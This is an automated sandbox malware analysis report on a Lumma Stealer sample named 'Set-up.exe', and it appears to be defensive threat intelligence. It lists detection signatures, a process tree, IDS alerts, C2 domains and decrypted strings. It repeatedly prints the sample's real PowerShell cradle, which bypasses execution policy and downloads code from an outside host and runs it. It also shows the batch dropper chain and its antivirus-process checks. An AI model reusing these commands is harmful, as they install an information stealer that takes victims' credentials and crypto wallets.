Edit tour

Windows Analysis Report
'Set-up.exe

Overview

General Information

Sample name:	'Set-up.exe
Analysis ID:	1585352
MD5:	9284c1e1be5769dc80792308a978330a
SHA1:	4f4bc4ba852fc6e17e1621d69d16167add1ab138
SHA256:	66e6f6875a1bc0e6aef2be9b6f4577c8245ca3b4ead13a4e3f8d6e9248c03843
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

'Set-up.exe (PID: 6156 cmdline: "C:\Users\user\Desktop\'Set-up.exe" MD5: 9284C1E1BE5769DC80792308A978330A)

cmd.exe (PID: 6484 cmdline: "C:\Windows\System32\cmd.exe" /c move Breasts Breasts.cmd & Breasts.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1448 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5744 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 2540 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5596 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2084 cmdline: cmd /c md 221480 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 6824 cmdline: extrac32 /Y /E Premium MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 3652 cmdline: findstr /V "SIGNIFICANT" Collective MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2124 cmdline: cmd /c copy /b 221480\Fires.com + Sk + Sb + Entire + Descriptions + Thats + Educators + Believe + Childrens + Pioneer + Retrieved 221480\Fires.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 3804 cmdline: cmd /c copy /b ..\Poster + ..\Debate + ..\Scheduling + ..\Fascinating + ..\Groove + ..\Stories + ..\Mailman F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Fires.com (PID: 6432 cmdline: Fires.com F MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 928 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 6888 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "nearycrepso.shop", "cloudewahsj.shop", "beattalkerz.cyou", "abruptyopsn.shop"], "Build id": "hRjzG3--DNO"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Fires.com F, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com, ParentProcessId: 6432, ParentProcessName: Fires.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 928, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Fires.com F, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com, ParentProcessId: 6432, ParentProcessName: Fires.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 928, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Fires.com F, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com, ParentProcessId: 6432, ParentProcessName: Fires.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 928, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Fires.com F, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com, ParentProcessId: 6432, ParentProcessName: Fires.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 928, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Fires.com F, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com, ParentProcessId: 6432, ParentProcessName: Fires.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 928, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Breasts Breasts.cmd & Breasts.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6484, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5596, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T14:51:47.479423+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.25.52	443	TCP
2025-01-07T14:51:48.496774+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.25.52	443	TCP
2025-01-07T14:51:49.732987+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.25.52	443	TCP
2025-01-07T14:51:51.050486+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.25.52	443	TCP
2025-01-07T14:51:52.238124+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.25.52	443	TCP
2025-01-07T14:51:53.801479+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.25.52	443	TCP
2025-01-07T14:51:54.808457+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.25.52	443	TCP
2025-01-07T14:51:55.858952+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.25.52	443	TCP
2025-01-07T14:51:57.472449+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	185.161.251.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T14:51:47.985484+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.25.52	443	TCP
2025-01-07T14:51:48.973354+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.25.52	443	TCP
2025-01-07T14:51:56.592665+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49744	104.21.25.52	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T14:51:47.985484+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49737	104.21.25.52	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T14:51:48.973354+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49738	104.21.25.52	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T14:51:55.398017+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.25.52	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/8574262446/ph.txtM)	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtp	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txteK	Avira URL Cloud: Label: malware
Source: https://beattalkerz.cyou:443/api	Avira URL Cloud: Label: malware
Source: https://beattalkerz.cyou/api	Avira URL Cloud: Label: malware
Source: https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop:443/int_clp_sha.txt	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txt~	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtX	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/Bp	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtQD	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000003.2107049168.000000000478B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "nearycrepso.shop", "cloudewahsj.shop", "beattalkerz.cyou", "abruptyopsn.shop"], "Build id": "hRjzG3--DNO"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 91.2% probability

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: beattalkerz.cyou
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String decryptor: hRjzG3--DNO

Source: 'Set-up.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: 'Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb\| source: powershell.exe, 00000011.00000002.2235876562.0000000007356000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD source: powershell.exe, 00000011.00000002.2235605610.00000000072E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2235442056.0000000007289000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2235442056.0000000007289000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2235769377.0000000007328000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2230662155.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbk source: powershell.exe, 00000011.00000002.2235876562.0000000007356000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_00DADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_00DBA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_00DBA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	12_2_00DAE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	12_2_00DBA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB66DC FindFirstFileW,FindNextFileW,FindClose,	12_2_00DB66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D7C622 FindFirstFileExW,	12_2_00D7C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_00DB73D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB7333 FindFirstFileW,FindClose,	12_2_00DB7333
